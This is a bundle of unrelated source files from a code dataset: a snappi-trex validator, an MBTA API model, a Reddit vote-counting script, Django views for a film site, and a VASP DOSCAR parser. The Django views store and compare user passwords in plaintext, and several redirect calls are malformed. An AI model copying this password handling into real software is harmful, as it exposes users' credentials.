must be integer')\n\n elif f_size['choice'] == 'fixed':\n val = f_size['fixed']\n if not isinstance(val, int):\n raise SnappiTrexException('\\'fixed\\' packet size must be integer')\n\n else:\n raise SnappiTrexException('Invalid packet \\'size\\' choice')\n\n\n @staticmethod\n def validate_value_option(header_field, layer_type, length):\n if header_field['choice'] == 'value':\n Validation.validate_address(header_field['value'], layer_type, length)\n elif header_field['choice'] == 'values':\n for val in header_field['values']:\n Validation.validate_address(val, layer_type, length)\n elif header_field['choice'] == 'increment':\n Validation.validate_increment(header_field['increment'], layer_type, length, 1)\n elif header_field['choice'] == 'decrement':\n Validation.validate_increment(header_field['decrement'], layer_type, length, -1)\n else: \n raise SnappiTrexException('Invalid field value choice')\n\n \n @staticmethod\n def validate_increment(field_inc, layer_type, length, dir):\n Validation.validate_address(field_inc['start'], layer_type, length)\n Validation.validate_address(field_inc['step'], layer_type, length)\n length = min(length, 64)\n if not isinstance(field_inc['count'], int):\n raise SnappiTrexException('\\'count\\' must be integer')\n start = Util.convert_to_long(field_inc['start'], layer_type)\n step = Util.convert_to_long(field_inc['step'], layer_type)\n cnt = field_inc['count']\n if step * cnt > Util.get_mask(length):\n raise SnappiTrexException('step*count cannot exceed the header field range')\n if length == 64 and start + dir*step*cnt > Util.get_mask(64) and start + dir*step*cnt < 0:\n raise SnappiTrexException('step*count is too high. Overflow is not support for 8 byte fields')\n\n \n @staticmethod\n def validate_address(addr, layer_type, length):\n error = False\n try:\n val = Util.convert_to_long(addr, layer_type)\n if val > Util.get_mask(length):\n error = True\n except ValueError as e:\n error = True\n except SyntaxError as e:\n error = True\n if error:\n raise SnappiTrexException('{0} is not a valid {1} address'.format(addr, layer_type))\n\n\n @staticmethod\n def validate_transmit(payload, config):\n if config is None:\n return\n all_flows = []\n for f in config.flows:\n all_flows.append(f.name)\n\n if payload.flow_names is not None:\n for f in payload.flow_names:\n if f not in all_flows:\n raise SnappiTrexException('{} is an unrecognized flow name'.format(f))\n if (payload.state != 'start') and (payload.state != 'stop') and (payload.state != 'pause'):\n raise SnappiTrexException('{} is not a valid transmit state'.format(payload.state))\n\n\n @staticmethod\n def validate_capture(payload, port_ids):\n if payload.port_names is not None:\n for p_name in payload.port_names:\n if p_name not in port_ids:\n raise SnappiTrexException('{} is an unrecognized port name'.format(p_name))\n if (payload.state != 'start') and (payload.state != 'stop'):\n raise SnappiTrexException('{} is not a valid capture state'.format(payload.state))\n\n\n @staticmethod\n def validate_capture_request(request, port_ids):\n p_name = request.port_name\n if p_name not in port_ids:\n raise SnappiTrexException('{} is an unrecognized port name'.format(p_name))\n\n\n @staticmethod\n def validate_link(payload, port_ids):\n if payload.port_names is not None:\n for p_name in payload.port_names:\n if p_name not in port_ids:\n raise SnappiTrexException('\\'{}\\' is an unrecognized port name'.format(p_name))\n if (payload.state != 'up') and (payload.state != 'down'):\n raise SnappiTrexException('{} is not a valid link state'.format(payload.state))\n\n\n @staticmethod\n def validate_metrics_request(request, port_ids):\n if request.choice is not None and request.choice != 'port':\n raise SnappiTrexException('\\'{}\\' is not a supported metrics choice'.format(request.choice))\n if request.port.port_names is not None:\n for p_name in request.port.port_names:\n if p_name not in port_ids:\n raise SnappiTrexException('\\'{}\\' is not a recognized port'.format(p_name))\n\n col_names = ['link', 'capture', 'frames_tx', 'frames_rx',\n 'bytes_tx', 'bytes_rx', 'frames_tx_rate', 'frames_rx_rate', \n 'bytes_tx_rate', 'bytes_rx_rate']\n if request.port.column_names is not None:\n for col in request.port.column_names:\n if col not in col_names:\n raise SnappiTrexException('\\'{}\\' is not a supported metrics column'.format(col))\n\n\n @staticmethod\n def validate_capture_settings(settings, port_ids):\n from snappi_trex.info import Info\n if settings is None:\n return\n for s in settings:\n for p_name in s['port_names']:\n if p_name not in port_ids:\n raise SnappiTrexException('\\'{}\\' is not a recognized port'.format(p_name))\n\n if s['format'] != 'pcap':\n raise SnappiTrexException('\\'{}\\' is not a supported capture format'.format(s['format']))\n if 'packet_size' in s and s['packet_size'] is not None:\n raise SnappiTrexException('maximum capture packet size options are not supported')\n # if not s['overwrite']:\n # raise SnappiTrexException('overwrite not supported for captures')\n\n capture_filter_info = Info.get_capture_filter_info()\n if 'filters' in s:\n for f in s['filters']:\n for proto in f:\n if proto == 'choice':\n continue\n if proto not in capture_filter_info:\n raise SnappiTrexException('\\'{}\\' is not a supported capture filter protocol'.format(proto))\n for field in f[proto]:\n if field not in capture_filter_info[proto]:\n raise SnappiTrexException('\\'{}\\' is not a supported capture filter {} field'.format(field, proto))\n\n\n\n\n\n\n\n\n","sub_path":"snappi_trex/validation.py","file_name":"validation.py","file_ext":"py","file_size_in_byte":13694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"495108398","text":"# coding: utf-8\n\n\"\"\"\n MBTA\n\n MBTA service API. https://www.mbta.com Source code: https://github.com/mbta/api # noqa: E501\n\n The version of the OpenAPI document: 3.0\n Contact: developer@mbta.com\n Generated by: https://openapi-generator.tech\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\nfrom openapi_client.configuration import Configuration\n\n\nclass InformedEntity(object):\n \"\"\"NOTE: This class is auto generated by OpenAPI Generator.\n Ref: https://openapi-generator.tech\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n openapi_types = {\n 'trip': 'str',\n 'stop': 'str',\n 'route_type': 'int',\n 'route': 'str',\n 'facility': 'str',\n 'direction_id': 'int',\n 'activities': 'list[str]'\n }\n\n attribute_map = {\n 'trip': 'trip',\n 'stop': 'stop',\n 'route_type': 'route_type',\n 'route': 'route',\n 'facility': 'facility',\n 'direction_id': 'direction_id',\n 'activities': 'activities'\n }\n\n def __init__(self, trip=None, stop=None, route_type=None, route=None, facility=None, direction_id=None, activities=None, local_vars_configuration=None): # noqa: E501\n \"\"\"InformedEntity - a model defined in OpenAPI\"\"\" # noqa: E501\n if local_vars_configuration is None:\n local_vars_configuration = Configuration()\n self.local_vars_configuration = local_vars_configuration\n\n self._trip = None\n self._stop = None\n self._route_type = None\n self._route = None\n self._facility = None\n self._direction_id = None\n self._activities = None\n self.discriminator = None\n\n if trip is not None:\n self.trip = trip\n if stop is not None:\n self.stop = stop\n if route_type is not None:\n self.route_type = route_type\n if route is not None:\n self.route = route\n if facility is not None:\n self.facility = facility\n if direction_id is not None:\n self.direction_id = direction_id\n if activities is not None:\n self.activities = activities\n\n @property\n def trip(self):\n \"\"\"Gets the trip of this InformedEntity. # noqa: E501\n\n Unique id of a trip # noqa: E501\n\n :return: The trip of this InformedEntity. # noqa: E501\n :rtype: str\n \"\"\"\n return self._trip\n\n @trip.setter\n def trip(self, trip):\n \"\"\"Sets the trip of this InformedEntity.\n\n Unique id of a trip # noqa: E501\n\n :param trip: The trip of this InformedEntity. # noqa: E501\n :type: str\n \"\"\"\n\n self._trip = trip\n\n @property\n def stop(self):\n \"\"\"Gets the stop of this InformedEntity. # noqa: E501\n\n Unique id of a stop # noqa: E501\n\n :return: The stop of this InformedEntity. # noqa: E501\n :rtype: str\n \"\"\"\n return self._stop\n\n @stop.setter\n def stop(self, stop):\n \"\"\"Sets the stop of this InformedEntity.\n\n Unique id of a stop # noqa: E501\n\n :param stop: The stop of this InformedEntity. # noqa: E501\n :type: str\n \"\"\"\n\n self._stop = stop\n\n @property\n def route_type(self):\n \"\"\"Gets the route_type of this InformedEntity. # noqa: E501\n\n | Value | Name | Example | |-------|---------------|------------| | `0` | Light Rail | Green Line | | `1` | Heavy Rail | Red Line | | `2` | Commuter Rail | | | `3` | Bus | | | `4` | Ferry | | # noqa: E501\n\n :return: The route_type of this InformedEntity. # noqa: E501\n :rtype: int\n \"\"\"\n return self._route_type\n\n @route_type.setter\n def route_type(self, route_type):\n \"\"\"Sets the route_type of this InformedEntity.\n\n | Value | Name | Example | |-------|---------------|------------| | `0` | Light Rail | Green Line | | `1` | Heavy Rail | Red Line | | `2` | Commuter Rail | | | `3` | Bus | | | `4` | Ferry | | # noqa: E501\n\n :param route_type: The route_type of this InformedEntity. # noqa: E501\n :type: int\n \"\"\"\n\n self._route_type = route_type\n\n @property\n def route(self):\n \"\"\"Gets the route of this InformedEntity. # noqa: E501\n\n Unique id of a route # noqa: E501\n\n :return: The route of this InformedEntity. # noqa: E501\n :rtype: str\n \"\"\"\n return self._route\n\n @route.setter\n def route(self, route):\n \"\"\"Sets the route of this InformedEntity.\n\n Unique id of a route # noqa: E501\n\n :param route: The route of this InformedEntity. # noqa: E501\n :type: str\n \"\"\"\n\n self._route = route\n\n @property\n def facility(self):\n \"\"\"Gets the facility of this InformedEntity. # noqa: E501\n\n Unique id of a facility # noqa: E501\n\n :return: The facility of this InformedEntity. # noqa: E501\n :rtype: str\n \"\"\"\n return self._facility\n\n @facility.setter\n def facility(self, facility):\n \"\"\"Sets the facility of this InformedEntity.\n\n Unique id of a facility # noqa: E501\n\n :param facility: The facility of this InformedEntity. # noqa: E501\n :type: str\n \"\"\"\n\n self._facility = facility\n\n @property\n def direction_id(self):\n \"\"\"Gets the direction_id of this InformedEntity. # noqa: E501\n\n Direction in which trip is traveling: `0` or `1`. The meaning of `direction_id` varies based on the route. You can programmatically get the direction names from `/routes` `/data/{index}/attributes/direction_names` or `/routes/{id}` `/data/attributes/direction_names`. # noqa: E501\n\n :return: The direction_id of this InformedEntity. # noqa: E501\n :rtype: int\n \"\"\"\n return self._direction_id\n\n @direction_id.setter\n def direction_id(self, direction_id):\n \"\"\"Sets the direction_id of this InformedEntity.\n\n Direction in which trip is traveling: `0` or `1`. The meaning of `direction_id` varies based on the route. You can programmatically get the direction names from `/routes` `/data/{index}/attributes/direction_names` or `/routes/{id}` `/data/attributes/direction_names`. # noqa: E501\n\n :param direction_id: The direction_id of this InformedEntity. # noqa: E501\n :type: int\n \"\"\"\n\n self._direction_id = direction_id\n\n @property\n def activities(self):\n \"\"\"Gets the activities of this InformedEntity. # noqa: E501\n\n Activities affected by this alert. If an entity is a station platform, and the alert only impacts those boarding at that platform and no one else, and the activity `\\\"BOARD\\\"` represents customers boarding at the informed entity, then the entity includes `activities` `[\\\"BOARD\\\"]`. If the alert affected customers exiting at the platform too, then `activities` is `[\\\"BOARD\\\", \\\"EXIT\\\"]`. It should be noted that the `activities` array includes activities that are specifically affected. Thus if there were activities `\\\"BOARD\\\"`, `\\\"EXIT\\\"`, and `\\\"USING_WHEELCHAIR\\\"` [to board or exit], and a station were closed, then the `activities` array would include `\\\"BOARD\\\"` and `\\\"EXIT\\\"` but it would not be necessary to include the activity `\\\"USING_WHEELCHAIR\\\"`. Any rider entering the station who is `\\\"USING_WHEELCHAIR\\\"` is also a rider who `\\\"BOARD\\\"`s. Using a wheelchair to board is not specifically affected. # noqa: E501\n\n :return: The activities of this InformedEntity. # noqa: E501\n :rtype: list[str]\n \"\"\"\n return self._activities\n\n @activities.setter\n def activities(self, activities):\n \"\"\"Sets the activities of this InformedEntity.\n\n Activities affected by this alert. If an entity is a station platform, and the alert only impacts those boarding at that platform and no one else, and the activity `\\\"BOARD\\\"` represents customers boarding at the informed entity, then the entity includes `activities` `[\\\"BOARD\\\"]`. If the alert affected customers exiting at the platform too, then `activities` is `[\\\"BOARD\\\", \\\"EXIT\\\"]`. It should be noted that the `activities` array includes activities that are specifically affected. Thus if there were activities `\\\"BOARD\\\"`, `\\\"EXIT\\\"`, and `\\\"USING_WHEELCHAIR\\\"` [to board or exit], and a station were closed, then the `activities` array would include `\\\"BOARD\\\"` and `\\\"EXIT\\\"` but it would not be necessary to include the activity `\\\"USING_WHEELCHAIR\\\"`. Any rider entering the station who is `\\\"USING_WHEELCHAIR\\\"` is also a rider who `\\\"BOARD\\\"`s. Using a wheelchair to board is not specifically affected. # noqa: E501\n\n :param activities: The activities of this InformedEntity. # noqa: E501\n :type: list[str]\n \"\"\"\n\n self._activities = activities\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.openapi_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, InformedEntity):\n return False\n\n return self.to_dict() == other.to_dict()\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n if not isinstance(other, InformedEntity):\n return True\n\n return self.to_dict() != other.to_dict()\n","sub_path":"openapi_client/models/informed_entity.py","file_name":"informed_entity.py","file_ext":"py","file_size_in_byte":10709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"283798934","text":"__author__ = [ 'agentnola', 'chrispytoast123', 'jb567' ]\nimport praw\nimport json\nimport gspread\nimport re\nfrom oauth2client.service_account import ServiceAccountCredentials\n\nbillMotionLocation = 'XII - Bill and Motion Votes'\namendmentLocation = 'XII - Amendment Votes'\nlastCellOnSheet = 'AZ'\nspreadsheet_key = '1C5lW-oBdq0m8bqqXfgV6koXyVfVII3h3y_k3PF_L7h8'\n\nhouseOfOrigin = '' # Leave Blank if Commons L if lords\nbillMotion = '' # B for Bill, M for Motion\nAmendment = '' # Only used in Amendment votes\n\n\n##FUNCTIONS {{{\ndef count(thread, sheet):\n global r\n global billMotionLocation\n global amendmentLocation\n con = 0\n not_con = 0\n dnv = 0\n\n bottomRow = int(sheet.find('Lord Speaker').row) - 1\n#Get latest vote column\n vote_cells = sheet.range('E2:' + lastCellOnSheet + '2')\n for cell in vote_cells:\n if cell.value == '':\n col = cell.col\n break\n#auto-DNV\n vote_list = sheet.range(sheet.get_addr_int(4,col) + ':' +\n sheet.get_addr_int(bottomRow, col))\n for cell in vote_list:\n if not cell.value.lower() == 'N/A'.lower():\n cell.value = 'DNV'\n dnv += 1\n sheet.update_cells(vote_list)\n\n# Automatically do the Bill Name\n title = str(submission.title)\n billNum = str(re.search('^(\\S+)', title).group())\n sheet.update_cell(2, col, billNum)\n print(billNum)\n if not re.search('^L', title) is None:\n sheet.update_cell(1, col, 'L')\n else:\n sheet.update_cell(1, col, 'C')\n# Amendment /Reading number\n if sheet.title == billMotionLocation:\n readingNum = ''\n if 'second' in title.lower() or '2nd' in title.lower():\n readingNum = '2nd'\n elif 'third' in title.lower() or '3rd' in title.lower():\n readingNum = '3rd'\n elif 'cloture' in title.lower():\n readingNum = 'Cloture'\n elif 'm' in title.lower():\n readingNum = 'Motion'\n print(readingNum)\n sheet.update_cell(3, col, '=HYPERLINK(\"'+thread+'\",\"'+readingNum+'\")')\n elif sheet.title == amendmentLocation:\n amendmentNum = str(re.search('(A\\d+)', title).group())\n sheet.update_cell(3, col, '=HYPERLINK(\"'+thread+'\",\"'+amendmentNum+'\")')\n\n#Get the eligible voters\n authors_cells = sheet.range('B4:' + sheet.get_addr_int(bottomRow, 2))\n authors = []\n for author in authors_cells:\n authors.append(str(author.value).lower())\n\n submission.replace_more_comments(limit=None, threshold=0)\n comments = praw.helpers.flatten_tree(submission.comments)\n\n# Setup dupe prevention stuff\n already_done_id = []\n already_done_name = []\n dupes = []\n\n for comment in comments:\n if comment.author in already_done_name:\n print('ALERT: DOUBLE VOTING ' + str(comment.author))\n dupes.append(comment.author)\n if comment.id not in already_done_id and str(comment.author).lower() not in 'automoderator':\n print(str(comment.author) + ': ' + comment.body)\n messageContent = ''\n try:\n if str(comment.author).lower() in authors:\n already_done_id.append(comment.id)\n already_done_name.append(comment.author)\n row = 4 + authors.index(str(comment.author).lower())\n if 'not content' in str(comment.body).lower():\n not_con += 1\n dnv -= 1\n messageContent='Not'\n elif 'content' in str(comment.body).lower():\n con += 1\n dnv -= 1\n messageContent='Con'\n if messageContent != '' and sheet.acell(sheet.get_addr_int(row,\n col)).value != 'N/A':\n sheet.update_cell(row,col, messageContent)\n else:\n dupes.append(comment.author)\n else:\n print('well thats not in the list...')\n except gspread.exceptions.CellNotFound:\n print('Automoderator Comment')\n print('Dupes are:' + str(dupes))\n print('Done')\n print('My Lords, there have voted [Content](#green): ' + str(con))\n print()\n print('[Not Content:](#red) ' + str(not_con))\n print()\n print('Did Not Vote: ' + str(dnv))\n print()\n print('Turnout: ' + str(sheet.acell(sheet.get_addr_int(bottomRow + 7,col)).value) + '%')\n print()\n print('The [Contents](#green) have it.' if con > not_con else 'The [Not Contents](#red) have it.')\n print('===========================')\n\n#Loads the JSON Key, which is provided seperately\nscope = ['https://spreadsheets.google.com/feeds']\n# Initilises all the credentials, and GoogleSheet stuff\ncredentials = ServiceAccountCredentials.from_json_keyfile_name('ServiceKey.json', scope)\ngc = gspread.authorize(credentials)\nr = praw.Reddit('MHOC Superior House vote Counter v1')\nsh = gc.open_by_key(spreadsheet_key)\n#User Input for Reddit/ Reddit information\nuser = str(input('Reddit Username:'))\nprint('Reddit Password:')\npassword = str(input())\nr.login(user,password)\nprint('Post Voting Thread Link')\nthread = str(input())\nsubmission = r.get_submission(thread)\ntitle = submission.title\nsheet = sh.worksheet(billMotionLocation if re.search('A\\d+', title) is None else amendmentLocation)\ncount(thread,sheet)\n","sub_path":"voteCount.py","file_name":"voteCount.py","file_ext":"py","file_size_in_byte":5447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"520443774","text":"import sys\n\nfrom Papers import Papers\n\n# python find-papers.py config.json\n\ndef main(argv):\n\tpapers = Papers(argv[0])\n\twhile True:\n\t\tpapers.promptToSearch()\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])","sub_path":"code-experiments/StoreNatureTitlesInEvernote/find-papers.py","file_name":"find-papers.py","file_ext":"py","file_size_in_byte":207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"567026154","text":"# -*- coding: utf-8 -*-\nfrom django.shortcuts import render\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.template import loader\nfrom django.urls import reverse\nfrom .models import UserPass, User, Movie, Instant\n\nimport json\nfrom django.core.serializers.json import DjangoJSONEncoder\n# Create your views here.\n\n\ndef index(request, template_name):\n member_name = False\n log = \"NULL\"\n if request.session.get('member_id', False):\n member_name = request.session.get('member_name', False)\n log = request.session.get('log', \"NULL\")\n return render(request, template_name, {'login_flag': member_name, 'log': log})\n\n\ndef products(request, template_name):\n member_name = False\n log = \"NULL\"\n if request.session.get('member_id', False):\n member_name = request.session.get('member_name', False)\n log = request.session.get('log', \"NULL\")\n return render(request, template_name, {'login_flag': member_name, 'log': log})\n\n\ndef comment(request, template_name):\n member_name = False\n log = \"NULL\"\n if request.session.get('member_id', False):\n member_name = request.session.get('member_name', False)\n log = request.session.get('log', \"NULL\")\n\n jiyi_comment = Instant.objects.filter(fileName__contains=\"记忆大师\")\n chaidan_comment = Instant.objects.filter(fileName__contains=\"拆弹专家\")\n if jiyi_comment.exists() and chaidan_comment.exists():\n jiyi_value = jiyi_comment.values_list('fileName', 'commentName', 'content', 'commentDate')\n jiyi_json = json.dumps(list(jiyi_value), cls=DjangoJSONEncoder)\n\n chaidan_value = chaidan_comment.values_list('fileName', 'commentName', 'content', 'commentDate')\n chaidan_json = json.dumps(list(chaidan_value), cls=DjangoJSONEncoder)\n\n return render(request, template_name, {'comment_json': jiyi_json,\n 'chaidan_json': chaidan_json,\n 'login_flag': member_name,\n 'log': log})\n\n else:\n return render(request, template_name, {'login_flag': False, 'log': log})\n\n\ndef community(request, template_name):\n member_name = False\n log = \"NULL\"\n if request.session.get('member_id', False):\n member_name = request.session.get('member_name', False)\n log = request.session.get('log', \"NULL\")\n return render(request, template_name, {'login_flag': member_name, 'log': log})\n\n\ndef details(request, movie_name):\n member_name = False\n log = \"NULL\"\n if request.session.get('member_id', False):\n member_name = request.session.get('member_name', False)\n request.session['log'] = movie_name\n\n movie = Movie.objects.filter(filmName__contains=movie_name)\n if movie.exists():\n movie_value = movie.values_list('filmName', 'filmScore', 'filmRelease', 'filmComment',\n 'filmDirector', 'filmActor', 'filmKind', 'filmCountry',\n 'filmLang', 'filmLong', 'filmContent', 'filmImage')\n movie_list = list(movie_value[0])\n movie_json = json.dumps(list(movie_value[0]), cls=DjangoJSONEncoder)\n imgpath = json.dumps(movie_list[11], cls=DjangoJSONEncoder)\n filmComment = movie_list[3]\n filmName = movie_list[0]\n filmScore = movie_list[1]\n filmRelease = movie_list[2]\n filmDirector = movie_list[4]\n filmActor = movie_list[5]\n filmKind = movie_list[6]\n filmCountry = movie_list[7]\n filmLang = movie_list[8]\n filmLong = movie_list[9]\n filmContent = movie_list[10]\n\n return render(request, 'filmi/details.html', {'img_src': imgpath, 'filmScore': filmScore,\n 'filmComment': filmComment, 'filmRelease': filmRelease,\n 'filmName': filmName, 'filmDirector': filmDirector,\n 'filmActor': filmActor, 'filmKind': filmKind,\n 'filmCountry': filmCountry, 'filmLang': filmLang,\n 'filmLong': filmLong, 'filmContent': filmContent,\n 'login_flag': member_name,\n })\n\n\ndef account(request, template_name):\n member_name = False\n log = \"NULL\"\n if request.session.get('member_id', False):\n member_name = request.session.get('member_name', False)\n log = request.session.get('log', \"NULL\")\n return render(request, template_name, {'login_flag': member_name, 'log':log})\n\n\ndef register(request):\n username = request.POST['username']\n age = request.POST['age']\n email = request.POST['email']\n actor = request.POST['actor']\n kind = request.POST['kind']\n movie = request.POST['movie']\n password = request.POST['pass']\n log = \"NULL\"\n try:\n u1 = User(username=username, age=age, email=email, actor=actor, kind=kind, movie=movie)\n u1.save()\n u2 = UserPass(user=username, password=password)\n u2.save()\n\n m = UserPass.objects.get(user=username)\n request.session['member_id'] = m.id\n request.session['member_name'] = m.user\n return HttpResponseRedirect(reverse('index'))\n except Exception :\n return render(request, 'filmi/account.html', {'login_flag': False, 'notice': \"此用户名已被注册,请输入其他用户名\", 'log': log})\n\n\ndef login(request):\n try:\n m = UserPass.objects.get(user=request.POST['email'])\n if m and m.password == request.POST['password']:\n request.session['member_id'] = m.id\n request.session['member_name'] = m.user\n return HttpResponseRedirect(reverse('index'))\n else:\n return HttpResponseRedirect(reverse('index'))\n except Exception:\n return HttpResponseRedirect(reverse('index'))\n\n\ndef search(request):\n member_name = False\n log = \"NULL\"\n if request.session.get('member_id', False):\n member_name = request.session.get('member_name', False)\n log = request.session.get('log', \"NULL\")\n img = True\n if request.POST['find']:\n return render(request, 'filmi/community.html', {'login_flag': member_name,\n 'img_flag': True,\n 'log': log})\n else:\n return render(request, 'filmi/community.html', {'login_flag': member_name,\n 'img_flag': False,\n 'log': log})\n\n\ndef logout(request):\n if request.session.get('member_id', False):\n member_name = request.session.get('member_name', \"null\")\n del request.session[\"member_name\"]\n return HttpResponseRedirect(request, 'filmi/index.html', {\"logout_flag\": member_name,\n \"login_flag\": member_name, 'log': \"NULL\"})\n else:\n return HttpResponseRedirect(request, 'filmi/index.html', {\"login_flag\": False,\n \"logout_flag\": False, 'log': \"NULL\"})\n\n\ndef change(request):\n log = \"NULL\"\n if request.session.get('member_id', False):\n member_name = request.session.get('member_name', False)\n log = request.session.get('log', \"NULL\")\n age = request.POST.get('age', \"null\")\n email = request.POST.get('email', \"null\")\n actor = request.POST.get('actor', \"null\")\n kind = request.POST.get('kind', \"null\")\n movie = request.POST.get('movie', \"null\")\n\n user = User.objects.get(username=member_name)\n if user:\n user.age = age\n user.email = email\n user.actor = actor\n user.kind = kind\n user.movie = movie\n\n user.save()\n\n return HttpResponseRedirect(request, 'filmi/index.html', {'login_flag': member_name, 'log': log})\n\n else:\n return HttpResponseRedirect(request, 'filmi/index.html', {'login_flag': False, 'log': log})\n\n\ndef person(request, user_name):\n log = \"NULL\"\n if request.session.get('member_id', False):\n log = request.session.get('log', \"NULL\")\n user = User.objects.filter(username__contains=user_name)\n user_value = user.values_list('username', 'age', 'email', 'actor', 'kind', 'movie')\n user_list = list(user_value[0])\n return render(request, 'filmi/person.html', {\"usr_name\": user_list[0], \"usr_age\": user_list[1],\n \"usr_email\": user_list[2], \"usr_actor\": user_list[3],\n \"usr_kind\": user_list[4], \"usr_movie\": user_list[5],\n \"login_flag\": user_name, \"log\": log})\n else:\n return HttpResponseRedirect(request, 'filmi/index.html', {\"login_flag\": False, \"log\": log})\n\n","sub_path":"filmi/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"85848475","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n#Still need to improve the code to print all plots in pdf\n#https://matplotlib.org/examples/color/named_colors.html for python colors\n'''\nThe DOSCAR file has the following organization:\n1) First there is a header. \n2) The important line from this is the 6th line which contains \n a) energy range used for the density of states,\n b) the number of bins, and \n c) the Fermi energy.\n3) In the case of non-spin-polarized calculation, you will see 3 columns:\n a) E, \n b) TDOS, and \n c) integrated TDOS. \n4) In the case of a spin-polarized calculation, you will see 5 columns: \n a) E, \n b) TDOS up, \n c) TDOS down, \n d) integrated TDOS up, and \n e) integrated TDOS down.\n5) if LORBIT = 11 then after this, at line NEDOS + 8, you'll have\nthe beginning of the partial density of states. \n a) Every NEDOS+1 lines, there will be another entry. \n b) Each of these blocks corresponds to each of the atoms listed in your POSCAR file. \n c) Between each the line of the header with energy ranges, etc. is repeated. \n d) The columns are ordered similarly to the PROCAR file labels. \n e) So the first column is the energy followed by: E, s, p_y, p_z, p_x, d_xy, d_yz, d_z2, d_xz, d_x2.\n f) Again, if it is spin-polarized, then there will be an up and down column for each of these. \n g) This would give 10 total columns or 19 if spin-polarized. \nIf you have included elements with POTCARs that specifically include f-orbitals, \nthen there will also be another 7 columns that deal with each of these (14 for spin polarization). \nAgain the order is similar to the PROCAR, except that now they are labeled with the lm number \n(-3, -2, -1, 0, 1, 2, 3). \n\nNow, since each atom is listed separately, you may need to sum up atoms to see the full \ncontribution from that species (for example to see the O 2p band in an oxide you would have to\nsum all three p orbitals for all O atoms). Or if you want to look at a layer in a material, you'll\nneed to manually sum up each atoms contribution in the layer. If you are curious about crystal \nfield effects on a given atom, the individual d-orbitals are given with respect to the Cartesian\ncoordinates (not the lattice constants). So if you have, say an octahedrally coordinated transition\nmetal, you may need to rotate the cell such that the octahedron is oriented along the Cartesian axes\n(or close to it if it is distorted).\n'''\n\n\n# In[2]:\n\n\n#from IPython.core.display import display, HTML\n#display(HTML(\"<style>.container { width:100% !important; }</style>\"))\n\n#from IPython.display import display, Math, Latex\nimport os\nimport re\nimport csv\nimport math\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom matplotlib.pyplot import figure\nfrom matplotlib.backends.backend_pdf import PdfPages\n\nimport ase.io\nimport ase.neighborlist\nfrom ase import atom\n\nprint(os.getcwd())\n\nDOSCARfileName='./DOSCAR' #dos data is present here\nCONTCARfileName='./CONTCAR' #required for counting and naming species etc.\nOUTDIR='./ldos'\nif not os.path.exists(OUTDIR):\n os.mkdir(OUTDIR)\npdosPlots='pdosPlots.pdf' #output file\n\nnormTotal=10\n#min=-113.879\n#Emax=12.031\n#DeltaE=0.01\n#Fermi=12.0361\n#totElectronsCheck=912\n\nsystem = ase.io.read(CONTCARfileName,format=\"vasp\")\n\n#get_ipython().run_line_magic('matplotlib', 'inline')\n#%matplotlib auto\n#font = {'family' : 'DejaVu Sans',\n# 'size' : 18}\n\n#matplotlib.rc('font', **font)\n#matplotlib.rc('xtick', labelsize=18) \n#matplotlib.rc('ytick', labelsize=18)\n\nSMALL_SIZE = 14\nMEDIUM_SIZE = 16\nBIGGER_SIZE = 18\n\nplt.rc('font', size=MEDIUM_SIZE) # controls default text sizes\nplt.rc('axes', titlesize=BIGGER_SIZE) # fontsize of the axes title\nplt.rc('axes', labelsize=BIGGER_SIZE) # fontsize of the x and y labels\nplt.rc('xtick', labelsize=SMALL_SIZE) # fontsize of the tick labels\nplt.rc('ytick', labelsize=SMALL_SIZE) # fontsize of the tick labels\nplt.rc('legend', fontsize=SMALL_SIZE) # legend fontsize\nplt.rc('figure', titlesize=BIGGER_SIZE) # fontsize of the figure title\n\n#global Elist\n#global pdostot\n#global temppdos\n\n\n# In[3]:\n\n\nDOSCARfile=open(DOSCARfileName,'r')\ni=0\nsumUP=0\nsumDOWN=0\nfor line in DOSCARfile :\n if (i==0):\n line=line.split()\n nAtm=int(line[0])\n if (i==5):\n #print(i-5,line)\n line=line.split()\n eMax=float(line[0])\n eMin=float(line[1])\n nBins=int(line[2])\n eFermi=float(line[3])\n if (i==6):\n line=line.split()\n if(len(line)==5):\n print(\"Spin polarized dos\")\n else:\n print(\"Not a spin polarized dos\")\n sumUP += float(line[1])\n sumDOWN += float(line[3])\n if (i>6 and i<=6+300):\n line=line.split()\n #print(line[0],line[1],line[3])\n if (float(line[0])<=eFermi):\n sumUP += float(line[1])\n sumDOWN += float(line[2])\n #print(line[0],\"\\t\",sumUP,\"\\t\",sumDOWN,\"\\t\",line[3],\"\\t\",line[4])\n i=i+1\nif(nAtm+1-(i-5)/(nBins+1)==0):\n print(\"Everything is allright\")\nelse:\n print(\"check your DOSCAR\")\nprint(sumUP, sumDOWN, 